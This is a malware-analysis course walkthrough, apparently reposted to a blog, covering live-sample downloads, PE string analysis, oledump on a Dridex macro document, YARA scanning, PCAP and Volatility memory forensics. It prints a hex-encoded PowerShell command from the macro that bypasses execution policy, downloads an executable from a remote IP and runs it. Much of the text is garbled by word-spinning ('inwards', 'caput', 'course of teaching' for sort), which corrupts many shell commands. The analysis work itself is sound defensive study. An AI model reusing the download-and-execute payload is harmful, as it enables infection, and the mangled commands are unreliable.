-->

Advanced Malware V3

Advanced Malware V3

############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts




- Log inwards to your Ubuntu organisation amongst the username 'malware' in addition to the password 'malware'.

- After logging delight opened upward a concluding window in addition to type the next commands:

cd Desktop/


- This is actual Malware (remmeber to run it inwards a VM - the password to extract it is 'infected':


cd /home/infosecaddicts/Desktop/
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate

unzip malware-password-is-infected.zip
    infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n two -C malware.exe

***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html


objdump -x malware.exe

strings malware.exe

strings --all malware.exe | caput -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

                            - We didn't run into anything similar HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join           

strings malware.exe | grep -i admin

strings malware.exe | grep -i list


                            - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile
     malware

vi analyse_malware.py

python analyse_malware.py malware.exe




Building a Malware Scanner
--------------------------

mkdir /Desktop/malwarescanner

cd /Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir /Desktop/malcode

cp /Desktop/malware.exe /Desktop/malcode

python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt

cd /Desktop/



#####################################################
# Analyzing Macro Embedded Malware                  #
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
#####################################################
cp /Desktop/

- Create a FREE trace of piece of occupation organisation human relationship on:
https://malwr.com/account/signup/

- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/

file /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

cat /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin




sudo pip install olefile
     malware

mkdir /Desktop/oledump

cd /Desktop/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

cp /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .

mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc


-----------------------------------------------------------------------------------------------------------------------------------



sudo pip install olefile
     malware

mkdir /Desktop/oledump

cd /Desktop/oledump

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip

unzip 064016.zip
     infected

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this nosotros tin privy run into this Word physician contains an embedded file called editdata.mso which contains 7 information streams.
- Three of the information streams are flagged every bit macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.


python oledump.py 064016.doc -s A5 -v

- As far every bit I tin privy tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.


python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" in addition to you lot should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts amongst 636D in addition to finishes amongst 653B in addition to glue it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm




##############
# Yara Ninja #
##############
sudo apt-get take -y yara
     malware

wget https://github.com/plusvic/yara/archive/v3.4.0.zip

sudo apt-get -y install libtool
     malware

unzip v3.4.0.zip

cd yara-3.4.0

./bootstrap.sh

./configure

make

sudo brand install
    malware

yara -v

cd ..

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd /Desktop

yara rules-master/packer.yar malcode/malware.exe


Places to larn to a greater extent than Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara



Yara dominion sorting script:
-------------------------
https://github.com/mkayoh/yarasorter



cd /Desktop/rules-master
for i inwards $( ls *.yar --hide=master.yar ); practice echo include \"$i\";done > master.yar
cd /Desktop/
yara rules-master/master.yar malcode/malware.exe










Here is a two i grand one thousand sample malware DB created past times Derek Morton that you lot tin privy usage to outset your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2


Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/




###############################
# Creating a Malware Database #
###############################

Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
    malware

wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip

unzip malware-password-is-infected.zip
    infected

python avsubmit.py --init

python avsubmit.py -f malware.exe -e





Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the next ascendancy inwards the terminal:

sudo apt-get install mysql-server
     malware
   
- Step 2: Installing Python MySQLdb module
- Run the next ascendancy inwards the terminal:

sudo apt-get build-dep python-mysqldb
     malware

sudo apt-get install python-mysqldb
     malware

Step 3: Logging inwards
Run the next ascendancy inwards the terminal:

mysql -u origin -p                    (set a password of 'malware')

- Then create i database past times running next command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py                        (fill inwards database connectedness information)

python mal_to_db.py -i

------- cheque it to run into if the files tabular array was created ------

mysql -u origin -p
    malware

show databases;

use malware;

show tables;

describe files;

exit;

---------------------------------


- Now add together the malicious file to the DB

python mal_to_db.py -f malware.exe -u



- Now cheque to run into if it is inwards the DB

mysql -u origin -p
    malware

mysql> usage malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;





#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics

ls | grep pcap

perl chaosreader.pl suspicious-time.pcap

firefox index.html

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | course of teaching | uniq -c | course of teaching -nr

sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
     malware  


for i inwards session_00[0-9]*.www.html; practice srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' |  cutting -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' |  cutting -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | course of teaching -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | course of teaching -u





#############################
# PCAP Analysis amongst tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | course of teaching -u


tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | course of teaching -u


tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'


tshark -r suspicious-time.pcap -Tfields -e "eth.src" | course of teaching | uniq


tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | course of teaching |uniq

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"


whois rapidshare.com.eyu32.ru

whois sploitme.com.cn


tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'



######################################
# PCAP Analysis amongst forensicPCAP.py #
######################################
cd /Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py

sudo easy_install cmd2
     malware

python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap

ForPCAP >>> help


Prints stats almost PCAP
ForPCAP >>> stat


Prints all DNS requests from the PCAP file. The id earlier the DNS is the packet's id which tin privy hold upward usage amongst the "show" command.
ForPCAP >>> dns

ForPCAP >>> show


Prints all destination ports from the PCAP file. The id earlier the DNS is the packet's id which tin privy hold upward usage amongst the "show" command.
ForPCAP >>> dstports

ForPCAP >>> show


Prints the release of ip source in addition to shop them.
ForPCAP >>> ipsrc

ForPCAP >>> show


Prints the release of web's requests in addition to shop them
ForPCAP >>> web

ForPCAP >>> show

Prints the release of mail's requests in addition to shop them
ForPCAP >>> mail

ForPCAP >>> show


###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility

python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
                ***Takes a few min***
strings 1752.dmp | grep "^http://" | course of teaching | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf



cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object eleven 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js

cat malicious.js


*****Sorry - no fourth dimension to encompass javascript de-obfuscation today*****


cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem                                   
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon   
for file inwards $(ls *.dmp); practice echo $file; strings $file | grep bankofamerica; done


Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser